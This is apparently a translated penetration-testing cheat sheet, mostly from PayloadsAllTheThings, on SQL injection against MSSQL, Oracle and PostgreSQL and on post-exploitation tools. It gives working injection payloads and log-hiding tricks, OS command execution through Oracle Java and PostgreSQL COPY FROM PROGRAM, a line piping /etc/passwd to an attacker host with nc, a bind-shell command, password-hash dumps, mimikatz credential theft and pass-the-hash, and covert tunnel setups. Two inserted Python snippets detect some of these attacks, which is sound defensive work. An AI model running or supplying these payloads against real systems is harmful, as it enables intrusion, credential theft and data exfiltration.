List the current user's effective permissions on a view:
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
Check whether the current user is a member of a given server role:
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');

Put SP_PASSWORD in the query to keep it out of the logs, e.g. ' AND 1=1--sp_password

MSSQL OPSEC

-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
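A detection-side companion to the sp_password trick above, added here as an example (not from the original page or from PayloadsAllTheThings): a small T-SQL scanner decides whether sp_password in a captured query sits only inside a comment or string literal, which is the signature of the log-hiding use rather than a real password change, and a second check recognises trace entries that were already replaced by the redaction comment. The sample queries and trace text are constructed.

```python
# Text SQL Server substitutes for an event body that contains sp_password
# (quoted on the page above).
REDACTION_TEXT = "'sp_password' was found in the text of this event"


def sp_password_contexts(sql):
    """Return the lexical context of every 'sp_password' occurrence in sql.

    Each entry is one of 'code', 'line_comment', 'block_comment' or 'string'.
    This is a minimal T-SQL scanner: '--' comments run to end of line,
    '/* */' delimits block comments, and '' is the escaped quote in strings.
    """
    contexts = []
    state = "code"
    i, n = 0, len(sql)
    while i < n:
        if state == "code":
            if sql.startswith("--", i):
                state, i = "line_comment", i + 2
                continue
            if sql.startswith("/*", i):
                state, i = "block_comment", i + 2
                continue
            if sql[i] == "'":
                state, i = "string", i + 1
                continue
        elif state == "line_comment" and sql[i] == "\n":
            state, i = "code", i + 1
            continue
        elif state == "block_comment" and sql.startswith("*/", i):
            state, i = "code", i + 2
            continue
        elif state == "string":
            if sql.startswith("''", i):  # escaped quote inside a string
                i += 2
                continue
            if sql[i] == "'":
                state, i = "code", i + 1
                continue
        if sql[i:i + 11].lower() == "sp_password":
            contexts.append(state)
            i += 11
            continue
        i += 1
    return contexts


def is_log_evasion(sql):
    """True when sp_password is present but only where it cannot execute
    (comment or string): the '--sp_password' trick rather than a real call."""
    contexts = sp_password_contexts(sql)
    return bool(contexts) and "code" not in contexts


def is_redacted_event(event_text):
    """True for a trace/audit entry whose body was replaced by the redaction comment."""
    return REDACTION_TEXT in event_text


# Constructed samples: two injected queries carrying the trick, a legitimate
# password change, and a harmless query.
SAMPLE_QUERIES = [
    "SELECT * FROM users WHERE name = 'admin' AND 1=1--sp_password",
    "SELECT * FROM users WHERE name = 'x' OR 1=1 /* sp_password */",
    "EXEC sp_password NULL, 'N3wP@ss', 'bob'",
    "SELECT 1",
]
# Constructed trace entry, as the page shows the replacement text.
SAMPLE_TRACE = ("-- 'sp_password' was found in the text of this event.\n"
                "-- The text has been replaced with this comment for security reasons.")


def triage(queries=SAMPLE_QUERIES):
    """Return the subset of queries that look like log-evasion attempts."""
    return [q for q in queries if is_log_evasion(q)]


if __name__ == "__main__":
    for q in triage():
        print("possible log-evasion:", q)
    print("trace entry redacted:", is_redacted_event(SAMPLE_TRACE))
```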

References

Note: most of this content is translated from https://github.com/swisskyrepo/PayloadsAllTheThings

oracle

Related tools:

Oracle: find the largest tables

select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;

select t.table_name tableName, f.comments comments
  from user_tables t
 inner join user_tab_comments f
    on t.table_name = f.table_name

Find which schema and table contain a column whose name includes USER

SELECT 
    owner AS database_name,
    table_name,
    column_name
FROM 
    all_tab_columns
WHERE 
    column_name LIKE '%USER%'
ORDER BY 
    owner, table_name, column_name;

Oracle SQL default databases

Name    Description
SYSTEM  Available in all versions
SYSAUX  Available in all versions

Oracle SQL comments

Type  Description
-- -  SQL comment

Oracle SQL version

SELECT user FROM dual UNION SELECT * FROM v$version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Oracle SQL hostname

SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;

Oracle SQL database name

SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;

Oracle SQL database credentials

SQL statement                          Description
SELECT username FROM all_users;        Available in all versions
SELECT name, password from sys.user$;  Privileged, <= 10g
SELECT name, spare4 from sys.user$;    Privileged, <= 11g

Oracle SQL list databases

SELECT DISTINCT owner FROM all_tables;

Oracle SQL list columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

Oracle SQL list tables

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

Oracle SQL error-based injection

Invalid HTTP Request: SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual
CTXSYS.DRITHSX.SN: SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual
Invalid XPath: SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual
Invalid XML: SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual
Invalid XML: SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users
SQL Error: SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))
XDBURITYPE getblob: XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()
XDBURITYPE getclob: XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()

When the injection point is inside a string use : '||PAYLOAD--

Oracle SQL blind injection

Version is 12.2: SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';
Subselect is enabled: SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)
Table log_table exists: SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);
Column message exists in table log_table: SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';
First letter of first message is t: SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';

Oracle SQL time-based injection

AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) 

Oracle SQL command execution

Oracle Java Execution

  • List Java privileges
    select * from dba_java_policy
    select * from user_java_policy
  • Grant privileges
    exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
    exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
    exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
  • Execute commands
    • 10g R2, 11g R1 and R2: DBMS_JAVA_TEST.FUNCALL()
      SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
      SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
    • 11g R1 and R2: DBMS_JAVA.RUNJAVA()
      SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL

Oracle Java Class

/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

or (hex encoded)

/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''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''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

References

Note: most of this content is translated from https://github.com/swisskyrepo/PayloadsAllTheThings

postgresql

PostgreSQL command execution

CVE-2019-9193

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

Using libc.so.6

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');

PostgreSQL comments

--
/**/

PostgreSQL query-chaining symbols

; # terminates a SQL command; within a statement it may only appear inside a string constant or quoted identifier.
|| # "or" (in PostgreSQL this is the string concatenation operator)

# usage examples:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))

PostgreSQL 版本

SELECT version()

PostgreSQL 当前用户

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

PostgreSQL user list

SELECT usename FROM pg_user

PostgreSQL password hash list

SELECT usename, passwd FROM pg_shadow 

List database administrator accounts

SELECT usename FROM pg_user WHERE usesuper IS TRUE

PostgreSQL privilege list

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

Check whether the current user is a superuser

SHOW is_superuser; 
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;

PostgreSQL database name

SELECT current_database()

PostgreSQL database list

SELECT datname FROM pg_database

PostgreSQL table list

SELECT table_name FROM information_schema.tables

PostgreSQL column list

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

PostgreSQL error-based injection

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

PostgreSQL XML helpers

select query_to_xml('select * from pg_user',true,true,''); -- returns all results as a single xml row
select database_to_xml(true,true,''); -- dumps the current database to XML
select database_to_xmlschema(true,true,''); -- dumps the current database to an XML schema

PostgreSQL blind injection

' and substr(version(),1,10) = 'PostgreSQL' and '1' -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1' -> KO

PostgreSQL time-based blind injection

select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))

select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

PostgreSQL stacked queries

http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--

PostgreSQL file read

select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);

PostgreSQL file write

CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';

Filter bypass

Quotes

Using CHR

SELECT CHR(65)||CHR(66)||CHR(67);

Using the $ sign (PostgreSQL 8 and later)

SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$
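Every technique in this PostgreSQL section leaves recognisable text in the server's statement log when log_statement = 'all' (or an audit extension) is enabled: COPY ... FROM PROGRAM, CREATE FUNCTION ... LANGUAGE c pointing at libc, pg_read_file/pg_ls_dir, pg_sleep and generate_series timing probes, the cast-to-int/numeric error-based probes, and reads of pg_shadow. The CHR() chains and $tag$ dollar quoting above exist precisely to dodge naive quote filters, so a log rule that keys on quotes misses them. The following is an added defensive example, not part of this cheat sheet or of PayloadsAllTheThings: it first undoes the two quote bypasses, then runs one rule per technique over constructed log lines. The log_line_prefix '%t [%p] %u@%d ' and all sample lines are assumptions made for the example.

```python
import re

# Constructed sample statement-log lines (log_line_prefix '%t [%p] %u@%d '), not real captures.
# Line 1 is ordinary application traffic; lines 2-8 reproduce statement shapes from this cheat sheet.
SAMPLE_LOG = """\
2024-01-01 12:00:01 UTC [4242] app@shop LOG:  statement: SELECT id, name FROM products WHERE id = 7
2024-01-01 12:00:02 UTC [4242] app@shop LOG:  statement: COPY cmd_exec FROM PROGRAM 'id'
2024-01-01 12:00:03 UTC [4243] app@shop LOG:  statement: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT
2024-01-01 12:00:04 UTC [4244] app@shop LOG:  statement: SELECT * FROM products WHERE id = 1;(select 1 from pg_sleep(5))
2024-01-01 12:00:05 UTC [4244] app@shop LOG:  statement: SELECT * FROM products WHERE name = '' and 1=cast((SELECT current_database()) as int) and '1'='1'
2024-01-01 12:00:06 UTC [4245] app@shop LOG:  statement: select pg_read_file(CHR(47)||CHR(101)||CHR(116)||CHR(99)||CHR(47)||CHR(112)||CHR(97)||CHR(115)||CHR(115)||CHR(119)||CHR(100), 0, 200)
2024-01-01 12:00:07 UTC [4245] app@shop LOG:  statement: COPY pentestlab(t) TO $tag$/tmp/pentestlab$tag$
2024-01-01 12:00:08 UTC [4246] app@shop LOG:  statement: SELECT usename, passwd FROM pg_shadow
"""

LOG_LINE = re.compile(
    r"^\S+ \S+ \S+ \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement:\s+(?P<stmt>.*)$"
)

# A run of CHR(n)||CHR(n)||... used to spell a string without any quote character.
CHR_CHAIN = re.compile(r"(?:chr\(\d+\)\s*\|\|\s*)+chr\(\d+\)|chr\(\d+\)", re.IGNORECASE)
# $$...$$ or $tag$...$tag$ dollar quoting. The tag group is \w* rather than optional so the
# backreference always participates, which Python's re requires for a match.
DOLLAR_QUOTE = re.compile(r"\$(\w*)\$(.*?)\$\1\$", re.DOTALL)


def normalize(stmt: str) -> str:
    """Undo the two quote-filter bypasses from the page so the rules below see plain literals."""
    def decode_chain(m: re.Match) -> str:
        codes = re.findall(r"chr\((\d+)\)", m.group(0), re.IGNORECASE)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    stmt = CHR_CHAIN.sub(decode_chain, stmt)
    stmt = DOLLAR_QUOTE.sub(lambda m: "'" + m.group(2) + "'", stmt)
    return stmt


# One rule per technique listed in this section; all run on the normalized statement.
RULES = [
    ("os-command-exec", re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.IGNORECASE | re.DOTALL)),
    ("native-function-load", re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+'?c'?(?![A-Za-z0-9_])", re.IGNORECASE | re.DOTALL)),
    ("server-file-access", re.compile(r"\b(?:pg_read_file|pg_read_binary_file|pg_ls_dir)\s*\(", re.IGNORECASE)),
    ("file-write", re.compile(r"\bCOPY\b.*\bTO\s+'", re.IGNORECASE | re.DOTALL)),
    ("time-based-probe", re.compile(r"\bpg_sleep\s*\(|\bgenerate_series\s*\(\s*1\s*,\s*\d{6,}", re.IGNORECASE)),
    ("error-based-probe", re.compile(r"\bcast\s*\(\s*\(?\s*select\b.*\bas\s+(?:int|integer|numeric)\s*\)", re.IGNORECASE | re.DOTALL)),
    ("password-hash-read", re.compile(r"\b(?:pg_shadow|pg_authid)\b", re.IGNORECASE)),
]


def scan_log(text: str) -> list:
    """Return (pid, user, normalized statement, [matched rule names]) for every flagged line."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a statement line (e.g. a DETAIL or ERROR continuation)
        stmt = normalize(m.group("stmt"))
        hits = [name for name, rx in RULES if rx.search(stmt)]
        if hits:
            findings.append((int(m.group("pid")), m.group("user"), stmt, hits))
    return findings


if __name__ == "__main__":
    for pid, user, stmt, hits in scan_log(SAMPLE_LOG):
        print(f"pid={pid} user={user} rules={','.join(hits)}: {stmt[:80]}")
```

Normalisation runs before matching on purpose: the sixth sample line carries its file path entirely as CHR() calls and the seventh hides the output path in $tag$ quoting, yet both are flagged the same way as their plain-quoted forms. Legitimate migrations also run CREATE FUNCTION and COPY ... TO, so in practice the native-function-load and file-write rules are scoped to application roles rather than to the DBA account; the superuser and pg_execute_server_program/pg_read_server_files membership queries earlier in this section tell you which roles could execute these statements in the first place.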

Note: most of this content is translated from: https://github.com/swisskyrepo/PayloadsAllTheThings

Tool usage command cheat sheet

mimikatz

Official GitHub: https://github.com/gentilkiwi/mimikatz

Dump logon credentials

mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
privilege::debug
sekurlsa::logonpasswords

Dump credentials from an lsass.exe minidump

mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

mimikatz pass-the-hash into cmd

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit"

mimikatz pass-the-hash into mstsc

mimikatz "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit"
privilege::debug
sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin"

Dump credentials from the SAM database

mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive"  "exit"

Dump credentials with a .bat script

@echo off
cd /d D:\tools\
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\windows\temp\log.txt

Dump the hashes of all domain users

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

proxy tools

iox

Download: https://github.com/EddieIvan01/iox

proxy

Start a SOCKS5 service locally on 0.0.0.0:1080

./iox proxy -l 1080

Encrypted forwarded SOCKS5 proxy:

VPS listener (// forwards the traffic received on port 1080 to port 50054):
nohup ./iox proxy -l 50054 -l 1081 -k 3211 > iox.log &

Run on the target host (// start the proxy service and connect it back to VPS port 50054):
./iox proxy -r VPSIP:50054 -k 3211

Then use the SOCKS5 proxy locally: socks5://vps:1081

fwd

Forward local port 3389 to the VPS:

Run on the VPS:
nohup ./iox fwd -l *8888 -l 33890 -k 22222

Run on the target machine:
iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222

Then connect to VPS:33890 to reach port 3389 on the internal network

fuso

GitHub: https://github.com/editso/fuso

socks

VPS:
./fus

// controlled host
./fuc.exe VPSIP 6722 --socks
  • linux: i686-unknown-linux-musl.zip
  • windows: x86_64-pc-windows-msvc.zip

readme

1. Port forwarding
fuc --forward-host xxx.xxx.xxx.xxx --forward-port
   --forward-host: address to forward to
   --forward-port: port to forward to
   e.g. forward traffic to the internal host 10.10.10.4:3389
   > fuc --forward-host 10.10.10.4 --forward-port 3389

2. socks5:
fuc --socks --su --s5p xxx --s5u xxx
   --su: optional, enable UDP forwarding
   --s5p: optional, authentication password; no password authentication by default
   --s5u: optional, authentication username, default anonymous
   --socks: optional, enable the SOCKS5 proxy; UDP is not forwarded unless --su is given
   e.g. enable UDP forwarding and password authentication
   > fuc --socks --su --s5p 123 --s5u socks
   UDP forwarding is now enabled, the password is "123" and the username is "socks"

3. Specify the port to visit once the tunnel is up
   fuc -b xxxx
   -b | --visit-bind-port: optional, randomly assigned by default
   e.g. forward external port 8888 to internal port 80
   > fuc --forward-port 80 -b 8888

4. Bridge mode. Note: UDP cannot currently be forwarded
   fuc --bridge-listen xxxx --bridge-port xxx
   --bridge-listen | --bl: listen address, default 127.0.0.1
   --bridge-port | --bp: listen port; bridging is disabled unless set
   e.g. start bridge mode listening on port 9999; this machine's IP is 10.10.10.2
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # start the bridge
   > fuc 10.10.10.2 9999 # connect through it

   Cascading:
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # first hop, IP: 10.10.10.2
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9991 10.10.10.2 9999 # second hop, IP: 10.10.10.3
   > fuc 10.10.10.3 9991 # final hop

5. Send connection notifications to Telegram or elsewhere
   fus --observer "program:[arguments]"
   --observer: hook run when a connection is established or closed
   e.g. use a bash script to send connection info to Telegram
   > fus --observer "/bin/bash:[telegram.sh]"

6. Specify the port used for client-server communication
   fuc --channel-port 8888 ...
   --channel-port: optional, port for client-server communication, random by default

ICMP tunnel with pingtunnel + frp

pingtunnel download: https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6

Controlled host

nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 >p.log &
nohup ./frpc -c frpc.ini > fff.log &

pingtunnel: -l listen on local port 9999, -s VPS host IP, -t VPS host frp server port

Client frp configuration

[common]
server_addr = 127.0.0.1
server_port = 10000
token = PassW0Rd

[zhaoshangju_10078]
type = tcp
remote_port = 10015
plugin = socks5
plugin_user = thIsuserAS
plugin_passwd = Passweqwe0Rm
use_encryption = true

VPS

./pingtunnel -type server
./frps -c frps.ini

Point a local proxy at VPS port 10015 with the credentials above to use the ICMP tunnel.

Reference: https://www.cnblogs.com/cute-puli/p/15213394.html

FRP

  • Put frps and frps.ini on the machine that has a public IP.
  • Put frpc and frpc.ini on the machine inside the internal network.
  • Client: frpc -c frpc.ini
  • Server: frps -c frps.ini

GitHub: https://github.com/fatedier/frp

Proxy tool list

Post-exploitation tool list

f8x

An automated deployment tool for red/blue team environments; supports multiple scenarios: penetration testing, development, proxy environments, optional services, etc.

Supershell

Supershell C2 remote-control platform; obtains a fully interactive shell over a reverse SSH tunnel

Viper

Internet attack surface management & red team simulation platform

Sliver C2

Sliver C2 is an open-source cross-platform red team framework.

Impacket

Python toolkit for internal network penetration testing